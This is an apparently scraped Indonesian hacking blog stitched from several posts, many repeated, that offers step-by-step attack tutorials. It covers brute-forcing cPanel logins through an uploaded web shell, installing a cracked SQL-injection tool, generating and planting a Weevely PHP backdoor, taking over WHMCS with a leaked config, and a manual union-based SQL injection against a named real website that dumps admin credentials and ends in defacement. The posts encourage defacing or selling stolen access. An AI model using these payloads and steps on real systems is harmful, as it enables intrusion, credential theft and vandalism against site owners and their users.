GoogleNewws.blogspot.com - kali Ini saya mau ngeshare cara membobol sebuah server,,
Tidak ada maksud lain bagi saya, kecuali membagi sedikit pengetahuan
yang saya punya kepada orang lain.
Jika diamati berita seputar keamanan internet, maka banyak sekali
informasi tentang bug/hole ataupun exploit yang beredar di Internet.
Semuanya hadir dengan informasi yang cukup detail dan membuat SysAdmin
harus terus berlomba dengan para Cracker/Hacker dalam mengamankan server
yang dikelola.
Jika diamati banyak sekali cara yang dilakukan oleh cracker untuk masuk
ke sebuah komputer. Cara yang tercepat dan paling mudah serta yang dulu
paling sering dilakukan adalah dengan menggunakan exploit yang sudah
tersedia di internet. Instant sekali. Kita cukup cari target, scanning,
compile exploit, execute exploit dan hapalkan dasar-dasar perintah OS
yang digunakan, so anda sudah memiliki server tersebut.
Secara garis besar exploit yang dipergunakan oleh cracker untuk masuk ke
sebuah server dapat dibagi dalam dua bagian yaitu :
1. Lokal Exploit
Yang dimaksud dengan lokal exploit adalah exploit yang hanya dapat
diexecute pada komputer itu sendiri. Artinya exploit ini tidak dapat
diexecute dari komputer pribadi untuk memasuki komputer lain. Biasanya
lokal exploit diexecute dan akan bisa menguasai sistem dengan
memanfaatkan kelemahan yang ada pada sistem operasi ataupun pada
aplikasi yang dijalankan oleh server.
2. Remote Exploit
Remote exploit adalah exploit yang dapat diexecute dari jarak jauh.
Artinya dengan menggunakan exploit ini, maka anda dapat masuk ke
komputer lain melalui komputer pribadi dengan memanfaatkan kelemahan
aplikasi yang berjalan di komputer lain tersebut. Bagi sebagian orang
lebih menyenangkan untuk menggunakan remote exploit daripada lokal
exploit karena biasanya remote exploit juga bisa menjadi lokal exploit
dan tidak berlaku sebaliknya.
Terlepas dari itu semua, sebenarnya ada resiko keamanan yang tetap
dimiliki sebuah komputer ketika telah berisikan Sistem Operasi beserta
aplikasi yang digunakan. Sebagai contoh, ketika kita telah menginstall
sebuah server dengan Sistem Operasi Linux Redhat 7.0 dengan berbagai
aplikasi misalkan apache web server, database mysql dan php. Maka Anda
sebagai SysAdmin secara 'sadar' telah membuka diri (komputer server)
kepada orang orang lain agar dapat berkomunikasi dengannya. Ada satu
pameo yang saya ingat, bahwa tidak ada satupun komputer yang aman ketika
sudah terkoneksi dengan sebuah jaringan. Apalagi jika jaringannya
adalah internet!. Dan ini juga berlaku untuk server yang telah kita
koneksikan ke internet.
Dari contoh di atas, ada beberapa hal yang menjadi catatan penting bagi
saya dan (mungkin) ini akan menjadi pedoman penting bagi SysAdmin untuk
tahu tingkat resiko keamanan pada server yang ia kelola. Misalkan saja
informasi server yang dikelola seperti tercantum di bawah ini :
1. Sistem Operasi yang digunakan adalah Redhat Linux 7.0
2. Aplikasi Web Server yang digunakan adalah Apache Web Server (Misalkan
saja versi 1.3.20)
3. Database Mysql versi 3.2.23
4. PHP Engine versi 4.1.x
5. Aplikasi web base yang menggunakan PHP dan MySQL.
Jika digambarkan dalam bentuk diagram pohon kurang lebihnya adalah
sebagai berikut :
+ Sistem Operasi [Level 1] :
+ Apache [Level 2]
+ Engine PHP [Level 3]
+ Aplikasi Web Based/Scripting PHP [Level 4]
+ MySQL [Level 2]
Dari informasi spesifikasi diatas maka dapat diketahui tingkat keamanan
komputer tersebut :
1. Keamanan pada Sistem Operasi (Versi Kernel yang digunakan) -Tingkat
Keamanan Level 1-
Jantung dari sistem operasi linux adalah kernel. Kesalahan pemrograman
yang terjadi pada kernel akan berakibat fatal dengan tidak berjalannya
sistem secara maksimal. Untuk hal ini coba cari tahu kernel yang
digunakan versi berapa dan apakah memiliki bug/hole?. Jika memang
terbukti memiliki bug/hole, maka sebaiknya secepatnya di upgrade dengan
versi yang lebih tinggi. Biasanya pada level ini lokal exploit yang
paling sering berperan untuk mendapatkan akses ke sebuah sistem,
walaupun tidak menutup kemungkinan bagi remote exploit untuk
mendapatkannya.
2. Keamanan pada Aplikasi Web Server (Versi Apache yang digunakan)
-Tingkat Keamanan Level 2-
Apache adalah salah satu aplikasi web server yang banyak digunakan di
dunia. Pada level ini yang harus anda perhatikan adalah versi apache
yang digunakan. Jika memang terbukti versi ini memiliki bug/hole,
segeralah upgrade apache yang anda miliki.
Sesuaikan lagi konfigurasi apache dengan keinginan anda. Matikan
module-module apache yang memang tidak digunakan. Ganti username dan
group aplikasi ini ke user yang tidak memiliki akses shell seperti
nobody. Jangan pasrahkan konfigurasi apache dengan konfigurasi default
dari proses instalasi. Pada level ini exploit yang paling sering
dipergunakan adalah remote exploit, karena pada level ini aplikasi
apache terbuka pada port 80, sehingga ada kemungkinan untuk
dibobol/disusupi dari jarak jauh.
3. Keamanan pada Aplikasi MySQL (versi MySQL yang digunakan) -Tingkat
Keamanan Level 2-
MySQL adalah salah satu database SQL yang cukup populer dan banyak
dipergunakan di internet. Integrasinya yang simple, clean and fast
dengan PHP membuktikan salah satu kelebihan PHP untuk menguasai pasar
aplikasi berbasis web based. Tidak berbeda jauh dengan Apache dan PHP,
maka hal terpenting yang harus dilihat disini adalah versi MySQL yang
anda gunakan. Pastikan bahwa pada versi ini tidak memiliki bug/hole. Hal
lainnya yang perlu menjadi perhatian adalah segera merubah password
default administrator database MySQL. Default instalasi MySQL memberikan
hak akses kepada user root dengan priveleges penuh dan tanpa password!.
Bayangkan jika anda lalai untuk merubahnya?
Jika database ini terkoneksi dengan internet/web, buatlah user MySQL
dengan priveleges yang berbeda dengan priveleges administrator (don't
ask me how to do this, please ask to uncle google :)). Database MySQL
membuka port 3306. Sehingga ada kemungkinan untuk di exploitasi dengan
menggunakan remote exploit ataupun lokal exploit.
Secara umum pada level 2 yang harus diperhatikan bahwa semua exploit
yang beredar di internet sangat banyak sekali yang memanfaatkan bug/hole
pada level aplikasi. Anda dapat mengikuti berita keamanan aplikasi yang
anda gunakan melalui situs-situs resmi aplikasi tersebut. Disini
dibutuhkan kecermatan dan kecepatan anda dalam mengikuti informasi
tentang keamanan internet. Jangan pernah lupa untuk mengupgrade, jika
memang situs resmi aplikasi tersebut menyarankannya. Jadi pada level ini
salah satu cara untuk menghindari berperang dengan cracker adalah
dengan selalu mengikuti berita/news untuk aplikasi yang anda jalankan.
Lengah sedikit, bisa jadi server anda yang menjadi target :-).
4. Keamanan pada Aplikasi PHP (Versi PHP yang digunakan) -Tingkat
Keamanan Level 3-
PHP adalah sebuah bahasa pemrograman yang saat ini banyak sekali
dipergunakan di internet. banyak sekali situs komersial yang menggunakan
PHP agar situsnya terlihat dinamis dan lebih interaktif. Namun pada
level 2, PHP yang dibicarakan disini bukan pada kode pemrograman
(scripting) yang telah dilakukan, namun pada engine PHP yang digunakan.
Sama seperti pada apache di level ini harus diperhatikan apakah versi
php yang digunakan memiliki bug/hole. Jika memang terbukti segeralah
uprade versi php tersebut. Selain itu jangan serahkan konfigurasi php
pada hasil default instalasi. Rubahlah beberapa variabelnya sesuai
dengan keinginan anda. Beberapa hal yang terpenting pada konfigurasi php
antara lain adalah SAFE_MODE dan REGISTER_GLOBAL. Cobalah bertanya
lebih lanjut tentang konfigurasi PHP pada paman google :-). AFAIK,
engine PHP tidak dapat diexploitasi dengan remote exploit karena engine
PHP tidak pernah membuka diri pada port tertentu. Jadi kalaupun ingin
mengexploitasi engine!
PHP hanya dapat menggunakan lokal exploit. CMIIW.
5. Keamanan pada Aplikasi Web Based yang berjalan -Tingkat Keamanan
Level 4-
Membangun sebuah aplikasi yang berbasis web adalah hal yang
menyenangkan. Bagaimana tidak?, dengan membangun aplikasi berbasis web,
maka aplikasi tersebut akan berjalan pada berbagai platform sistem
operasi, selain itu untuk pengembangan lebih lanjut juga akan mudah
sekali. Namun dibalik itu semua, ternyata aplikasi berbasis web juga
menyimpan sebuah bahaya yang sangat besar bagi keamanan komputer.
Tercatat pada memori saya beberapa hal yang dapat dilakukan hanya karena
kesalahan scripting aplikasi web based, antara lain :
1. Mengupload file seperti eggdrop, psybnc, dll.
2. Mendownload backdoor seperti bindtty, yang berakibat cracker akan
memiliki akses shell dan selanjutnya tinggal mencari lokal exploit.
3. Mengacak-acak database MySQL
4. Mengintip nama-nama user yang berada pada /etc/passwd
5. Mendefaced website
Sehebat apapun proteksi sebuah sistem tidak dapat menutupi kelemahan
yang ada pada aplikasi web based. Salah satu contoh konkret yang
terlihat sampai dengan saat ini adalah bobolnya Situs KPU karena
bug/hole SQL Injection. Dani Firman Syah a.k.a xnuxer berhasil dengan
baik memanfaatkan kesalahan scripting yang dilakukan oleh Tim IT KPU,
sehingga dia berhasil merubah nama-nama partai yang ada dalam database.
Kelemahan web based biasanya bisa terjadi karena :
a. Kurang mampu dalam menganalis algoritma pemrograman web based.
b. Penggunaan fungsi-fungsi pemrograman web based yang tidak sesuai
dengan tempatnya.
c. Ketidakhati-hatian dalam menggunakan CMS yang sudah jadi seperti
Php-Nuke, Post-Nuke, Mambo, dll.
d. Tidak adanya perbedaan method POST dan GET pada aplikasi web based
yang digunakan
e. Masih banyak lagi yang lain :)
Saran saya untuk level ini (jika anda membuat sendiri aplikasi web
based). Coba dan cobalah terus berlatih untuk membuat sebuah algoritma
pemrograman web yang 'bersih', 'rapi', 'teratur' dan sesuai dengan
fungsinya. Jangan pernah merasa bahwa aplikasi yang anda buat adalah
aplikasi yang handal dan tidak bisa ditembus orang lain. Kalau perlu
mintalah tolong kepada orang lain untuk mengecek algoritma pemrograman
anda dan mengetest kode pemrograman anda. Jangan publish aplikasi web
based tersebut jika anda belum yakin dengan algoritma yang telah anda
susun.
Jika menggunakan CMS yang sudah jadi, cobalah ikuti berita bug/hole yang
dimilikinya. Sampai dengan saat ini seperti Php-Nuke sudah sering
sekali memiliki kelemahan pada bug/hole SQL injection. Kelemahan yang
ada pada Php-Nuke ini dimanfaatkan beberapa gelintir orang untuk membuat
remote exploitnya yang berbasis pada pemrograman perl ataupun php.
Untuk hal ini saya cuma bisa menyarankan jangan pernah anda lengah
dengan menggunakan versi CMS yang ternyata memiliki bug/hole :).
Untuk lebih tahu detail tentang bahayanya aplikasi web based dengan
menggunakan PHP, silahkan buka arsip diskusi milis
jasakom-perjuangan@yahoogroups.com beberapa bulan yang lalu, disitu
dibahas tentang bahayanya beberapa hal seperti GET, POST, INCLUDE,
REFERRER (based on PHP), atau kalau belum puas silahkan cari tutorial di
google untuk membuat aplikasi web based yang 'bersih'
Home » Posts filed under Hacking
Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts
Monday, December 30, 2013
Sunday, December 29, 2013
Cara Mudah Crack Cpanel
GoogleNewws.blogspot.com - Kali ini saya akan shere cara mudah crack Cpanel dengan metode bruteforce. Hampir setiap hari ada saja teman yang PM di facebook minta tutor cara crack Cpanel. Namun saat saya berikan link tutor dengan tujuan biar dipelajari sendiri, mereka selalu bilang : ribet, susah ! . Mungkin karena mereka newbie kali ya. Padahal saya sendiri juga newbie. Newbie tolol malahan. Hihihi.
Berdasarkan pengalaman itulah akhirnya saya membuat tutorial ini dengan tujuan tidak ada lagi kata "susah" dalam melakukan cracking Cpanel.
Oke, kita siapkan bahan-bahannya :
Shell 1n73ct10n - Download disini
Wordlist - Download disini
Langkah-langkah :
Usahakan kalian sudah mengupload shell Injection di web korban. Jika belum, ya upload dulu. :p
Sekarang kita klik menu Cpanel Bruteforce yang ada di Shell Injection
Langkah selanjutnya, lihat bagian bawah. Klik tombol "Please click Here First"
Setelah itu, click BACK lalu klik lagi menu Cpanel Bruteforce [seperti gambar1]. Lihat gambar diatas. Ada tulisan No Security for Function. Berarti bisa dilanjutkan. Kalo nggak bisa, yasudah. Berhenti saja ngecracknya. :p
Lalu masukkan list password yang tertera dalam Wordlist diatas ke kolom "pass" . Kemudian klik "start"
Tunggu aja sampai proses cracking selesai. Agak lama memang. Kalo mau sambil lihat bokep silahkan. Eh, jangan ding .. :v
Tuh, user sama passwordnya kelihatan. [tapi disini gue sensor]
Terus gimana cara login ke Cpanelnya ?
Masukkan saja www.[site].com/cpanel . maka kalian akan dibawa menuju halaman login cpanel.
Isi user dan password sesuai dengan data yang didapat dari hasil cracking tadi. Dan...
GOTCHAAAA !!!!!!!!
Masuk ke Cpanel bre ....
Cukup sampai disini saya menemani anda. :v
Silahkan dilanjutkan sendiri. Mau didepes atau mau dijual tuh Cpanel. Yang penting jangan buat bot komen ya. Member JKT48 juga nggak bakalan bilang WOW kok meski elo pake bot komen. :p
Berdasarkan pengalaman itulah akhirnya saya membuat tutorial ini dengan tujuan tidak ada lagi kata "susah" dalam melakukan cracking Cpanel.
Oke, kita siapkan bahan-bahannya :
Shell 1n73ct10n - Download disini
Wordlist - Download disini
Langkah-langkah :
Usahakan kalian sudah mengupload shell Injection di web korban. Jika belum, ya upload dulu. :p
![]() |
| Gambar1 |
![]() |
| Gambar2 |
![]() |
| Gambar3 |
![]() |
| Gambar4 |
Tunggu aja sampai proses cracking selesai. Agak lama memang. Kalo mau sambil lihat bokep silahkan. Eh, jangan ding .. :v
![]() |
| Gambar5 |
Terus gimana cara login ke Cpanelnya ?
Masukkan saja www.[site].com/cpanel . maka kalian akan dibawa menuju halaman login cpanel.
![]() |
| Gambar6 |
![]() |
| Gambar7 |
Masuk ke Cpanel bre ....
Cukup sampai disini saya menemani anda. :v
Silahkan dilanjutkan sendiri. Mau didepes atau mau dijual tuh Cpanel. Yang penting jangan buat bot komen ya. Member JKT48 juga nggak bakalan bilang WOW kok meski elo pake bot komen. :p
Source : Madura Cyber
Download Havij pro 1.17 Full Cracked
GoogleNewws.blogspot.com - Selamat pagi sobat, kali ini saya akan share salah satu tools SQL Injection yang paling populer, apalagi kalo bukan havij :D
Mungkin sudah banyak yang punya karena ini termasuk tools lama. namun baru sempat saya share karena bingung mau posting apa. :3 . Oke langsung saja ini screenshoot nya :
Berikut yang diupdate dari versi sebelumnya :
What's New?
-----------
-Multithreading
-Oracle Blind injection method.
-Automatic all parameter scan added.
-New blind injection method (no more ? char.)
-Retry for blind injection.
-A new method for tables/columns extraction in mssql blind.
-A WAF bypass method for mysql blind.
-Getting tables and columns even when can not get current database.
-Auto save log.
-bugfix: url encode bug fixed.
-bugfix: trying time based methods when mssql error based and union based fail.
-bugfix: clicking get columns whould delete all tables.
-bugfix: reseting time based method delay when applying settings.
-bugfix: utf-8 and unicode encoding
ini Link Downloadnya :
Download Havij Pro 1.17 Cracked
Cara install nya :
Install Havij Pro 1.17
Letakkan Loader.exe di direktori dimana havij Terinstall : C:\Program Files\ITSecTeam\Havij Pro
Lalu buka loader.exe ( run as administrator bila diperlukan )
Lalu klik register (tanpa mengisi apa apa di serial number dan load file)
Maka Havij 1.17 siap digunakan. :)
Sekian postingan kali ini, semoga bermanfaat.
Mungkin sudah banyak yang punya karena ini termasuk tools lama. namun baru sempat saya share karena bingung mau posting apa. :3 . Oke langsung saja ini screenshoot nya :
Berikut yang diupdate dari versi sebelumnya :
What's New?
-----------
-Multithreading
-Oracle Blind injection method.
-Automatic all parameter scan added.
-New blind injection method (no more ? char.)
-Retry for blind injection.
-A new method for tables/columns extraction in mssql blind.
-A WAF bypass method for mysql blind.
-Getting tables and columns even when can not get current database.
-Auto save log.
-bugfix: url encode bug fixed.
-bugfix: trying time based methods when mssql error based and union based fail.
-bugfix: clicking get columns whould delete all tables.
-bugfix: reseting time based method delay when applying settings.
-bugfix: utf-8 and unicode encoding
ini Link Downloadnya :
Download Havij Pro 1.17 Cracked
Cara install nya :
Install Havij Pro 1.17
Letakkan Loader.exe di direktori dimana havij Terinstall : C:\Program Files\ITSecTeam\Havij Pro
Lalu buka loader.exe ( run as administrator bila diperlukan )
Lalu klik register (tanpa mengisi apa apa di serial number dan load file)
Maka Havij 1.17 siap digunakan. :)
Sekian postingan kali ini, semoga bermanfaat.
Tutorial BackConnect Dengan Weevely | in Windows
GoogleNewws.blogspot.com - Meskipun baru nyoba tadi, saya share aja deh. Sekalian biar tutornya kesimpen di blog. Biar enak kalo mau nyari-nyari lagi. Hehehehehe. Agak pusing nyari tutor Back Connect rata rata suruh pakai Netcat . Nah, apesnya, mungkin karena saya yang bego, ditunggu sampai satu jam gak mau connect ke server, padahal command-command yang saya jalankan sudah betul :(
Oke langsung s aja, gak usah basa-basi :p .
Bagi yang belum punya, download dulu bahan-bahannya :
Python
Python Read Line
Weevely
Install semua bahan diatas.
Untuk Weevely, saya ekstrak di direktori C:\tools\weevely\ . Jadi nanti command commandnya ngikutin sendiri ya :p
Pertama , buka CMD, arahkan ke folder tempat sobat mengekstrak weevely tadi .
cd C:\tools\weevely
Lalu kita coba membuat file php dengan perintah main.py -g -o namashell.php -p password
contoh : main.py -g -o akicha.php -p akicha
Tunggu sampai proses selesai. Lihat SS :
Buka folder weevely, pasti ada file akicha.php, lalu upload ke web target. Di public_html saja biar gampang
Langkah ke tiga, masukkan command berikut :
main.py -t -u http://target.com/akicha.php -p akicha
Tunggu sampai proses selesai :)
Sip, backconnect sukses.
Simpel kan ? :D
Bagaimana kok saya tau kalo backconnect sukses ?
Saya test dengan menggunakan fingsi wget
wget http://newbieakicha.tk/x.txt
Hasilnya ?
http://sitotis.net/x.txt
Sebenarnya tutorial ini adalah awalan saat kita ingin melakukan roting . Cuman karena saya belum bisa rooting, tutorial cukup sampai disini saja :p . Doakan supaya cepat bisa ngeroot server :3
Oke langsung s aja, gak usah basa-basi :p .
Bagi yang belum punya, download dulu bahan-bahannya :
Python
Python Read Line
Weevely
Install semua bahan diatas.
Untuk Weevely, saya ekstrak di direktori C:\tools\weevely\ . Jadi nanti command commandnya ngikutin sendiri ya :p
Pertama , buka CMD, arahkan ke folder tempat sobat mengekstrak weevely tadi .
cd C:\tools\weevely
Lalu kita coba membuat file php dengan perintah main.py -g -o namashell.php -p password
contoh : main.py -g -o akicha.php -p akicha
Tunggu sampai proses selesai. Lihat SS :
![]() |
| Step 1 |
![]() |
| Step 2 |
main.py -t -u http://target.com/akicha.php -p akicha
Tunggu sampai proses selesai :)
Sip, backconnect sukses.
Simpel kan ? :D
Bagaimana kok saya tau kalo backconnect sukses ?
Saya test dengan menggunakan fingsi wget
wget http://newbieakicha.tk/x.txt
Hasilnya ?
http://sitotis.net/x.txt
![]() |
| wew, orang ganteng >.< |
Source: Madura Cyber
Labels:
Hacking
Tutorial Hack WHM dan cPanel dengan WHMCS Killer
GoogleNewws.blogspot.com - Sebenarnya ini tutorial lama sih. Di google juga sudah banyak tersebar :D . tapi siapa tau ada yang belum bisa. jadi sekalian share di blog sederhana saya ini :) . Oke langsung saja.
Sebelumnya, sobat harus punya WHMCS Killer nya. kalo belum punya, silahkan download di :
Download WHMCS Killer V3
Langsung ke langkah-langkah :
Pertama, sobat harus dapetin dulu config WHMCS nya. Entah dengan cara symlink atau cara apa :D
Contoh Config WHMCS :
<?php
$license = 'Owned-fgdfffgtyrydfd6c8c3d';
$db_host = 'localhost';
$db_username = 'serverasd_usr';
$db_password = 'KjlKuItsdf';
$db_name = 'serverasd_whmcs';
$cc_encryption_hash = '6mnWFdQMWlmRJsJaxih007Hr9KCwxTRu54gB8WdV7qCHIbI6kPXaMurM5U8tDPNz';
$templates_compiledir = 'templates_c/';
$mysql_charset = 'utf8';
?>
Setelah itu, upload WHMCS Killer di webnya :D
Tinggal diisni kolom kolomnya sesuai dengan yang tertera di file config tadi :D
lalu kilk submit....
naih sudah masuk. kalo sudah gitu ya terserah mau diapain :p
kalo mau lihat password sama user WHM ya tinggal klik menu H0st R00ts
Atau kalo mau ngurut urut cPanel nya tinggal klik menu Clients hosting Account :D
Sekian postingan sederhana dari saya, semoga bermanfaat :)
Sebelumnya, sobat harus punya WHMCS Killer nya. kalo belum punya, silahkan download di :
Download WHMCS Killer V3
Langsung ke langkah-langkah :
Pertama, sobat harus dapetin dulu config WHMCS nya. Entah dengan cara symlink atau cara apa :D
![]() |
| Contoh Config WHMCS |
<?php
$license = 'Owned-fgdfffgtyrydfd6c8c3d';
$db_host = 'localhost';
$db_username = 'serverasd_usr';
$db_password = 'KjlKuItsdf';
$db_name = 'serverasd_whmcs';
$cc_encryption_hash = '6mnWFdQMWlmRJsJaxih007Hr9KCwxTRu54gB8WdV7qCHIbI6kPXaMurM5U8tDPNz';
$templates_compiledir = 'templates_c/';
$mysql_charset = 'utf8';
?>
Setelah itu, upload WHMCS Killer di webnya :D
Tinggal diisni kolom kolomnya sesuai dengan yang tertera di file config tadi :D
lalu kilk submit....
naih sudah masuk. kalo sudah gitu ya terserah mau diapain :p
kalo mau lihat password sama user WHM ya tinggal klik menu H0st R00ts
![]() |
| User and Password WHM :p |
Sekian postingan sederhana dari saya, semoga bermanfaat :)
Labels:
Hacking
Step by Step Manual SQL Injection
GoogleNewws.blogspot.com - Beberapa waktu lalu saya pernah share tutorial SQLi menggunakan Tool HAVIJ. Ya, mungkin dengan Havij anda sudah bisa mendapatkan username dan password web yang vuln SQLi. Namun mungkin anda tidak akan pernah tahu cara kerjanya karena HAvij bekerja secara otomatis. Kita hanya terima jadi saja.
oleh karena itu kali ini saya akan shere tutorial SQLi secara manual. Saya mendapat tutorial ini dari x'1n73ct.
Alat : Browser Firefox . Kenapa harus firefox ? Karena kita harus menginstall addons HACKBAR yang [sepertinya] hanya ada di Firefox. Hackbar itu seperti apa sih ? Nih screenshotnya ;
Fungsinya ? Simak saja tutorialnya sampai akhir maka anda akan tahu fungsi dari hackbar. Untuk yang belum menginstall hackbar silahkan menuju link berikut :
https://addons.mozilla.org/id/firefox/addon/hackbar/
Oke, kita mulai tutorialnya :
Step 1 :
Cari target vuln SQLi di google. Dork yang bisa digunakan :
inurl:"research.php?cid="
"id=" & intext:"Warning: mysql_fetch_assoc()
"id=" & intext:"Warning: mysql_fetch_array()
Untuk dork lain silahkan cari sendiri atau kreasikan sendiri.
Sebagai web korban untuk tutorial ini saya memilih :http://kkverma.com/content/research.php?cid=2
Kita tambahkan tanda kitip satu ['] di akhri url untuk memastikan apakah webnya vuln SQLi atau tidak.
Sehingga menjadi : http://kkverma.com/content/research.php?cid=2'
Di situ tertulis : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' order by uid' at line 1 . Error ! Artinya web tersebut vuln SQLi
Step 2 :
Lanjut. Sekarang kita cari tau jumlah table di databasenya dengan perintah “order by” . Cari hingga menemukan error.
http://kkverma.com/content/research.php?cid=2 order by 1-- normal
http://kkverma.com/content/research.php?cid=2 order by 2-- normal
http://kkverma.com/content/research.php?cid=2 order by 3-- normal
http://kkverma.com/content/research.php?cid=2 order by 4-- normal
http://kkverma.com/content/research.php?cid=2 order by 5-- normal
http://kkverma.com/content/research.php?cid=2 order by 6-- ERROR
di "order by 6" kita mendapatkan error dengan tulisan : Unknown column '6' in 'order clause' yang kalo diartikan menjadi "eh, gile lu ye. Mana ada kolom 6" . Sekarang kita sudah tahu kalo jumlah kolom di databasenya ada 5 [karena error di angka 6].
Step 3 :
Sekarang kita mulai mencari "angka ajaib" yang bisa kita injeksi di step sejanjutnya dengan memasukkan perintah union select. Perhatikan saja url yang saya tulis dibawah :
http://kkverma.com/content/research.php?cid=-2 union select 1,2,3,4,5-- [ ingat, setelah ?cid= diberi tanda - ]
Muncul angka ajaib 3 dan 4 .
Step 4 :
Sekarang kita coba untuk melihat versi php dengan angka ajaib tadi. Caranya ialah dengan memasukan perintah “ @@version “atau “ version() ” kedalam salah satu angka yang muncul tadi.
http://kkverma.com/content/research.php?cid=-2 union select 1,2,version(),4,5 -- [karena 3 tadi termasuk angka ajaib]
Tertulis 5.1.61 . Versi php 5 . Berarti tutorial ini masih bisa dilanjutkan. Karena jika menemukan php versi 4 kita harus menebak sendiri isi/tabel dari databasenya.
Step 5 :
Kita akan memunculkan nama-nama table yang ada di dalam database dengan mengganti perintah “ @@version ” dengan “group_concat(table_name) ” dan menambahkan perintah “ from information_schema.tables where table_schema=database() ” sesudah angka terakhir , sebelum tanda --
http://kkverma.com/content/research.php?cid=-2 union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=database()--
Kita melihat ada table admin, research, vcounter .
Step 6 :
Sekarang main logika disini. Dimana biasanya akan disimpan data berupa user dan password ? Tentu jawabannya adalah di table admin. Kita coba melihat kolom dari table admin tersebut .
Disinilah hackbar dibutuhkan. Untuk merubah suatu kata menjadi bentuk MySQL CHAR(). Caranya : klik tombol SQL -> MySQL -> MySQL CHAR() . Lalu kita convert kata "admin" menjadi bentuk MySQL CHAR() .
Dan hasil convert dari kata admin adalah CHAR(97, 100, 109, 105, 110)
Step 7 :
Tahap selanjutnya yaitu mengetahui kolom yang ada pada table admin tersebut. Cara mengganti perintah “ group_concat(table_name) ” dengan perintah “ group_concat(column_name) ” dan mengganti perintah “ information_schema.tables “ menjadi “ information_schema.columns ” juga mengganti perintah “ table_schema=database() ” dengan perintah “ table_name=[hasil convert MySQL CHAR() - Step 6] ”
http://kkverma.com/content/research.php?cid=-2 union select 1,2,group_concat(column_name),4,5 from information_schema.columns wheretable_name=CHAR(97, 100, 109, 105, 110)--
Kita mendapat kolom aid, admin id, admin pass di tabel admin.
Step 8 :
Sekarang kita coba membuka data yang ada di kolom aid, admin id , dan admin pass .
Caranya ialah mengganti perintah group_concat(table_name) menjadi group_concat(aid,0x3a,admin_id,0x3a,admin_pass) dan mengganti perintah “ from information_schema.columns where table_name=CHAR(97, 100, 109, 105, 110)—“ dengan perintah “from admin—“ . disitu kita melihat ada tanda 0x3a. Apa maksudnya ? 0x3a adalah bentuk HEX dari tanda : sehingga data nanti akan dipisah dengan tanda : .
http://kkverma.com/content/research.php?cid=-2 union select 1,2,group_concat(aid,0x3a,admin_id,0x3a,admin_pass),4,5 from admin--
Kita mendapatkan data berikut ;
aid : 1
Admin ID : admin
Admin Pass : bimogay --- adminnya bernama Bimo, orangnya Gay. Hihihi
Step 9 :
Sekarang kita coba mencari halaman loginnya. Tidak bakal jauh dari kata "admin" ataupun "login" . Kalo malas mencari manual, cari dengan software Admin Finder. Cari sendiri di Google.
Kita menemukan halaman loginnya terletak di :
http://kkverma.com/admin
Masukkan user dan password sesuai dengan data yang telah kita dapat.
Dan.......
Uh, indahnya dunia ini. :v
Masuk halaman admin bray. Namun ternyata tidak bisa upload shell. Kita deface saja dengan metode JS Overlay.
Sekian tutorial kali ini, semoga bermanfaat.
Greetz : x'1n73ct
Content created by Yuyud HNc a.k.a Nabilaholic404
Copas tanpa Link Sumber = JANCOK
[+] JKT48 CYBER TEAM [+]
Source : Madura Cyber
oleh karena itu kali ini saya akan shere tutorial SQLi secara manual. Saya mendapat tutorial ini dari x'1n73ct.
Alat : Browser Firefox . Kenapa harus firefox ? Karena kita harus menginstall addons HACKBAR yang [sepertinya] hanya ada di Firefox. Hackbar itu seperti apa sih ? Nih screenshotnya ;
Fungsinya ? Simak saja tutorialnya sampai akhir maka anda akan tahu fungsi dari hackbar. Untuk yang belum menginstall hackbar silahkan menuju link berikut :
https://addons.mozilla.org/id/firefox/addon/hackbar/
Oke, kita mulai tutorialnya :
Step 1 :
Cari target vuln SQLi di google. Dork yang bisa digunakan :
inurl:"research.php?cid="
"id=" & intext:"Warning: mysql_fetch_assoc()
"id=" & intext:"Warning: mysql_fetch_array()
Untuk dork lain silahkan cari sendiri atau kreasikan sendiri.
Sebagai web korban untuk tutorial ini saya memilih :http://kkverma.com/content/research.php?cid=2
Kita tambahkan tanda kitip satu ['] di akhri url untuk memastikan apakah webnya vuln SQLi atau tidak.
Sehingga menjadi : http://kkverma.com/content/research.php?cid=2'
Di situ tertulis : You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' order by uid' at line 1 . Error ! Artinya web tersebut vuln SQLi
Step 2 :
Lanjut. Sekarang kita cari tau jumlah table di databasenya dengan perintah “order by” . Cari hingga menemukan error.
http://kkverma.com/content/research.php?cid=2 order by 1-- normal
http://kkverma.com/content/research.php?cid=2 order by 2-- normal
http://kkverma.com/content/research.php?cid=2 order by 3-- normal
http://kkverma.com/content/research.php?cid=2 order by 4-- normal
http://kkverma.com/content/research.php?cid=2 order by 5-- normal
http://kkverma.com/content/research.php?cid=2 order by 6-- ERROR
di "order by 6" kita mendapatkan error dengan tulisan : Unknown column '6' in 'order clause' yang kalo diartikan menjadi "eh, gile lu ye. Mana ada kolom 6" . Sekarang kita sudah tahu kalo jumlah kolom di databasenya ada 5 [karena error di angka 6].
Step 3 :
Sekarang kita mulai mencari "angka ajaib" yang bisa kita injeksi di step sejanjutnya dengan memasukkan perintah union select. Perhatikan saja url yang saya tulis dibawah :
http://kkverma.com/content/research.php?cid=-2 union select 1,2,3,4,5-- [ ingat, setelah ?cid= diberi tanda - ]
Muncul angka ajaib 3 dan 4 .
Step 4 :
Sekarang kita coba untuk melihat versi php dengan angka ajaib tadi. Caranya ialah dengan memasukan perintah “ @@version “atau “ version() ” kedalam salah satu angka yang muncul tadi.
http://kkverma.com/content/research.php?cid=-2 union select 1,2,version(),4,5 -- [karena 3 tadi termasuk angka ajaib]
Tertulis 5.1.61 . Versi php 5 . Berarti tutorial ini masih bisa dilanjutkan. Karena jika menemukan php versi 4 kita harus menebak sendiri isi/tabel dari databasenya.
Step 5 :
Kita akan memunculkan nama-nama table yang ada di dalam database dengan mengganti perintah “ @@version ” dengan “group_concat(table_name) ” dan menambahkan perintah “ from information_schema.tables where table_schema=database() ” sesudah angka terakhir , sebelum tanda --
http://kkverma.com/content/research.php?cid=-2 union select 1,2,group_concat(table_name),4,5 from information_schema.tables where table_schema=database()--
Kita melihat ada table admin, research, vcounter .
Step 6 :
Sekarang main logika disini. Dimana biasanya akan disimpan data berupa user dan password ? Tentu jawabannya adalah di table admin. Kita coba melihat kolom dari table admin tersebut .
